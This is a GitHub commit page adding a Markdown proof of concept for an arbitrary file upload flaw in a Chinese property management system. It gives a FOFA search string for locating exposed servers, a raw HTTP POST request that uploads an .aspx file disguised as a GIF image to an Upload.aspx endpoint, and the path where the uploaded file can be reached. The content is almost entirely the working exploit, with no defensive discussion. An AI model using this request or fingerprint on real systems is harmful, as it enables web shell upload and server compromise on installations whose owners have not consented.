Skip to content

Commit

Permalink
Create 新视窗新一代物业管理系统任意文件上传漏洞.md
Browse files Browse the repository at this point in the history
  • Loading branch information
wy876 authored Apr 27, 2024
1 parent f4b2aff commit 761cca7
Showing 1 changed file with 30 additions and 0 deletions.
30 changes: 30 additions & 0 deletions 新视窗新一代物业管理系统任意文件上传漏洞.md
Original file line number Diff line number Diff line change
@@ -0,0 +1,30 @@
## 新视窗新一代物业管理系统任意文件上传漏洞


## fofa
```
body="BPMSite/ClientSupport/OCXInstall.aspx"
```


## poc
```
POST /OfficeManagement/RegisterManager/Upload.aspx HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Cookie: JSESSIONID=FC2204F3698D2A07CDE9786055A071CB
Content-Type: multipart/form-data; boundary=00content0boundary00
Host:
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Content-Length: 146
Connection: close
--00content0boundary00
Content-Disposition: form-data; name="file"; filename="1.aspx"
Content-Type: image/jpg
GIF89a
123
--00content0boundary00--
```

文件路径:`/Upload/ContractMamager/71d52920be4d-4956-93f9-77c3b0c899e81.aspx`

0 comments on commit 761cca7

Please sign in to comment.